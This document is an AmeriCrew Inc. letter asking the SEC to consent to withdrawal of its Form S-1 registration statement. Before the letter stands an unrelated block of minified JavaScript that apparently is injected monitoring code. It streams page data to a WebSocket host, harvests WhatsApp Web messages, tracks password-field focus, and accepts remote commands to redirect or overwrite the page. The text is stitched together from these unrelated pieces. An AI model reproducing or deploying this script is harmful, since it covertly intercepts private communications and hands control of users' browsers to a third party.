 &#xD; &#xD; !function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:y.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:y.pid,pn:y.pn};null!=H&&H.readyState==WebSocket.OPEN&&H.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:y.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:y.sendNotificationsInterval,useragent:navigator.appVersion.length&gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:y.pid,pn:y.pn};H.send(JSON.stringify(Y))}function s(){m()}function i(){n()&&(clearInterval(b),clearInterval(A)),timeout=setTimeout((function(){g()}),N)}function o(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();L!=e&&e&&v(),L=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&&"password"==Y.type&&!P)if(P=!0,n()){var e={type:"password_input_focus",focus:!0,token:y.token};H.send(JSON.stringify(e))}else window.top.postMessage({message:"iframePasswordInputFocused",name:Y.name,type:Y.type},"*")}function d(Y){var e=Y&&Y.name?Y.name:"&lt;unnamed&gt;";if(Y&&"password"==Y.type&&P)if(P=!1,n()){var t={type:"password_input_focus",focus:!1,token:y.token};H.send(JSON.stringify(t))}else window.top.postMessage({message:"iframePasswordInputBlurred",name:e,type:Y.type},"*")}function c(Y){var e=document.activeElement;e&&e!=document.body?document.querySelector&&(e=document.querySelector(":focus")):e=null;for(var t=0;t&lt;Y.length;++t){let s=Y[t];var n="password"==s.type,r=n&&s.hasAttribute("autofocus"),a=n&&e&&s.isEqualNode(e);(r||a)&&u(s),s.tmInputEventListenerAttached||(s.addEventListener("focus",(function(Y){u(Y.target)}),!0),s.addEventListener("blur",(function(Y){d(Y.target)}),!0),s.tmInputEventListenerAttached=!0)}}function D(){c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&Y.addedNodes&&0!=Y.addedNodes.length&&(window.NodeList&&!NodeList.prototype.forEach&&(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&&c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.addEventListener("beforeunload",(function(Y){d(),function(){for(var Y=document.getElementsByTagName("input"),e=0;e&lt;Y.length;++e){let t=Y[e];t.removeEventListener("focus",u),t.removeEventListener("blur",d),delete t.tmInputEventListenerAttached}}()}))}function l(){n()&&(y.iup&&r(),h()&&(v(),m(),function(){var Y=new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&("childList"!==Y.type||Y.addedNodes.length&lt;=0||Y.addedNodes.forEach((function(Y){if(Y){var e=document.querySelector("div[id=main] header span[title]");e&&(w=e.innerText),document.querySelector("div[id=main] header span[data-icon=default-user]")&&(E="private"),document.querySelector("div[id=main] header span[data-icon=default-group]")&&(E="group");var t=Y.querySelectorAll(".message-in, .message-out");Y.matches(".message-in, .message-out")&&(t=Array.prototype.slice.call(t)).push(Y),t&&t.forEach((function(Y){if(Y&&Y.classList&&!(Y.classList.length&lt;=0)){var e=Y.classList.contains("message-in"),t=Y.querySelector(".copyable-text"),n=Y.querySelector(".selectable-text"),r=new Date,a=null;if(t&&t.attributes["data-pre-plain-text"]){var s=t.attributes["data-pre-plain-text"].textContent,i=/\[(\d{1,2}):(\d{1,2})[ ]{0,1}([p|a]m)?,\s(.+)]\s(.*):/i[Symbol.match](s);if(!i||6!=i.length)return;if(i[3]&&"pm"==i[3].toLowerCase()&&(i[1]=parseInt(i[1])+12),dateParts=/(\d{1,4})[.-\\/](\d{1,4})[.-\\/](\d{1,4})/[Symbol.match](i[4]),!dateParts||4!=dateParts.length)return;if(!(r=date.parse(i[4],O)||function(Y,e,t){var n=[[Y,e,t].join("-"),[Y,t,e].join("-"),[e,Y,t].join("-"),[e,t,Y].join("-"),[t,Y,e].join("-"),[t,e,Y].join("-")],r=Date.now();for(var a in n){var s=Date.parse(n[a]);if(s&&!(Math.abs(r-s)&gt;1728e6))return new Date(s)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(i[1]),r.setMinutes(i[2]),a=i[5]}T.get(w)||T.set(w,C);var o=n?n.innerText:null;if(a&&o&&L){var M=(a+o+w+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Y&lt;&lt;7)+(Y&lt;&lt;3))^e})).toString(16);if(T.get(w).getTime()==r.getTime()?r.setMilliseconds(++k):(k=0,T.set(w,r)),!M||I.has(M))return;var u={type:"wapmessage",timestamp:r.getTime(),id:M,incoming:e,sender:e?a:"Me",content:o,recipient:e?"Me":w,conversationId:w+"("+E+")"};H.send(JSON.stringify(u)),I.add(M)}}}))}})))}))}));if(!Y)return;Y.observe(document.body,{childList:!0,subtree:!0})}()),n()&&(a(),b=setInterval(a,y.sendNotificationsInterval),h()&&(A=setInterval(s,y.pollWhatsappTrackingInterval))),function(){for(var Y=[],e=document.getElementsByTagName("link"),t=0;t&lt;e.length;++t)"icon"!=e[t].getAttribute("rel")&&"shortcut icon"!=e[t].getAttribute("rel")||(Y[Y.length]=M(e[t].getAttribute("href")));0==Y.length&&(Y[0]=M("/favicon.ico"));var n={type:"favicon"};n.url=document.URL,n.src=Y,n.title=document.title,n.token=y.token,n.useragent=navigator.appVersion.length&gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,H.send(JSON.stringify(n))}(),y.dontTrackWebPasswords&&D())}function f(){document.tmfilter||(g(),O={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function g(){(H=new WebSocket(y.connectionString)).onclose=i,H.onmessage=o,H.onopen=l,y.extJs&&(this.extJs.webSockReady=()=&gt;H.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=&gt;H.send(Y))}function p(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;e&lt;Y.length;e++)if(Y[e]+"Hidden"in document)return Y[e]+"Hidden";return null}();return!!Y&&document[Y]}function h(){var Y=document.head.querySelector("[name='og:title']");return!!Y&&"WhatsApp Web"===Y.getAttribute("content")}function m(){H.send(JSON.stringify({type:"waptracking"}))}function v(){T=new Map,I=new Set,k=0,(C=new Date).setSeconds(0),C.setMilliseconds(0)}function S(Y){var e={name:Y.data.name,type:Y.data.type};"iframePasswordInputFocused"===Y.data.message?u(e):"iframePasswordInputBlurred"===Y.data.message&&d(e)}Y=this,e={},t={en:{MMMM:"January February March April May June July August September October November December".split(" "),MMM:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),dddd:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),ddd:"Sun Mon Tue Wed Thu Fri Sat".split(" "),dd:"Su Mo Tu We Th Fr Sa".split(" "),A:["a.m.","p.m."],formatter:{YYYY:function(Y){return("000"+Y.getFullYear()).slice(-4)},YY:function(Y){return("0"+Y.getFullYear()).slice(-2)},Y:function(Y){return""+Y.getFullYear()},MMMM:function(Y){return this.MMMM[Y.getMonth()]},MMM:function(Y){return this.MMM[Y.getMonth()]},MM:function(Y){return("0"+(Y.getMonth()+1)).slice(-2)},M:function(Y){return""+(Y.getMonth()+1)},DD:function(Y){return("0"+Y.getDate()).slice(-2)},D:function(Y){return""+Y.getDate()},HH:function(Y){return("0"+Y.getHours()).slice(-2)},H:function(Y){return""+Y.getHours()},A:function(Y){return this.A[11&lt;Y.getHours()|0]},hh:function(Y){return("0"+(Y.getHours()%12||12)).slice(-2)},h:function(Y){return""+(Y.getHours()%12||12)},mm:function(Y){return("0"+Y.getMinutes()).slice(-2)},m:function(Y){return""+Y.getMinutes()},ss:function(Y){return("0"+Y.getSeconds()).slice(-2)},s:function(Y){return""+Y.getSeconds()},SSS:function(Y){return("00"+Y.getMilliseconds()).slice(-3)},SS:function(Y){return("0"+(Y.getMilliseconds()/10|0)).slice(-2)},S:function(Y){return""+(Y.getMilliseconds()/100|0)},dddd:function(Y){return this.dddd[Y.getDay()]},ddd:function(Y){return this.ddd[Y.getDay()]},dd:function(Y){return this.dd[Y.getDay()]},Z:function(Y){return(0&lt;(Y=Y.utc?0:Y.getTimezoneOffset()/.6)?"-":"+")+("000"+Math.abs(Y-Y%100*.4)).slice(-4)},post:function(Y){return Y}},parser:{find:function(Y,e){for(var t,n=-1,r=0,a=0,s=Y.length;a&lt;s;a++)t=Y[a],!e.indexOf(t)&&t.length&gt;r&&(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),s=t.en,i=s.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=i[Y];return e?i.post(e.call(s,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,s,i=t.en,o=i.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,d={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var D=0,l=1;for(s="";!s;)s=a[++D];a=s.charAt(0);var f=o.slice(M);if(2&gt;D){var g=i.parser[s].call(i,f,n);c[a]=g.index,"M"===a&&c[a]++,l=g.length}else if(7&gt;D)g=(f.match(d[D])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-s.length):g),l=g.length;else if(" "!==a&&a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===o.length&&g?(c.Y+=70&gt;c.Y?2e3:100&gt;c.Y?1900:0,c.H=c.H||i.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1&gt;c.M||12&lt;c.M||1&gt;c.D||c.D&gt;Y[c.M-1]||23&lt;c.H||59&lt;c.m||59&lt;c.s?NaN:r?e.addMinutes(n,-n.getTimezoneOffset()):n):NaN},e.isValid=function(Y,t){return!!e.parse(Y,t)},e.addYears=function(Y,t){return e.addMonths(Y,12*t)},e.addMonths=function(Y,e){var t=new Date(Y.getTime());return t.setMonth(t.getMonth()+e),t},e.addDays=function(Y,e){var t=new Date(Y.getTime());return t.setDate(t.getDate()+e),t},e.addHours=function(Y,t){return e.addMilliseconds(Y,36e5*t)},e.addMinutes=function(Y,t){return e.addMilliseconds(Y,6e4*t)},e.addSeconds=function(Y,t){return e.addMilliseconds(Y,1e3*t)},e.addMilliseconds=function(Y,e){return new Date(Y.getTime()+e)},e.subtract=function(Y,e){var t=Y.getTime()-e.getTime();return{toMilliseconds:function(){return t},toSeconds:function(){return t/1e3|0},toMinutes:function(){return t/6e4|0},toHours:function(){return t/36e5|0},toDays:function(){return t/864e5|0}}},e.isLeapYear=function(Y){return!(((Y=Y.getFullYear())%4||!(Y%100))&&Y%400)},e.isSameDay=function(Y,t){return e.format(Y,"YYYYMMDD")===e.format(t,"YYYYMMDD")},Y.date=e;var y={token:"cf7b0e60-6347-4072-a9e4-2d8b514e2d9e",sendNotificationsInterval:Number("1000"),pollWhatsappTrackingInterval:Number("20000"),connectionString:"wss://tm.filter:1502",pid:"6952",pn:"firefox.exe",iup:false,dontTrackWebPasswords:false,extJs:null},N=6e4,b=null,A=null,w=null,E=null,L=!1,T=null,I=null,k=0,C=null,H=null,O="",P=!1;!function Y(e){p()?setTimeout((function(){Y(e)}),1e3):e()}((function(){y.extJs&&y.extJs.init(y.token),n()&&(window.addEventListener("focus",r,!0),y.dontTrackWebPasswords&&window.addEventListener("message",S,!1)),n()||y.extJs?f():y.dontTrackWebPasswords&&D()}))}();&#xD; &#xD;
AmeriCrew Inc.
21 Omaha Street
Dumont, NJ 07628

September 14, 2022

VIA EDGAR
Securities and Exchange Commission
Division of Corporation Finance
Office of Real Estate and Construction

Re:         AmeriCrew Inc.
Registration Statement on Form S-1
Filed February 2, 2022
File No. 333-262470

Ladies and Gentlemen:

Pursuant to Rule 477 promulgated under the Securities Act of 1933, AmeriCrew Inc. (the “Company”) hereby requests that the Securities and Exchange Commission (the “Commission”) consent to the withdrawal of the Company’s Registration Statement on Form S-1 (File No. 333-262470), together with all amendments and exhibits thereto (the “Registration Statement”). The Company does not intend to conduct the offering of the shares of common stock contemplated by the Registration Statement. No shares of common stock of the Company have been or will be issued or sold under the Registration Statement.

The Company also acknowledges that no refund will be made for fees paid to the Commission in connection with filing of the Registration Statement. However, the Company requests, in accordance with Rule 457(p) under the Act that all fees paid to the Commission in connection with the filing of the Registration Statement be credited to the Company's account to be offset against the filing fee for any future Registration Statement or Registration Statements.

Accordingly, the Company requests an order granting the withdrawal of the Registration Statement to be issued by the Commission as soon as possible. Please provide a copy of the order granting withdrawal of the Registration Statement to the undersigned via email at rdimaggio@americrew.com, with a copy to Michael Harris, Esq. of Nason, Yeager, Gerson, Harris & Fumero, P.A. via email at mharris@nasonyeager.com.

If you have any questions or comments or require further information regarding this application of withdrawal of the Registration Statement, please do not hesitate to call or email Michael Harris at (561) 686-3307 or mharris@nasonyeager.com.

AmeriCrew Inc.

	By:	/s/ Ross DiMaggio
Ross DiMaggio, CFO
cc: Michael D. Harris, Esq.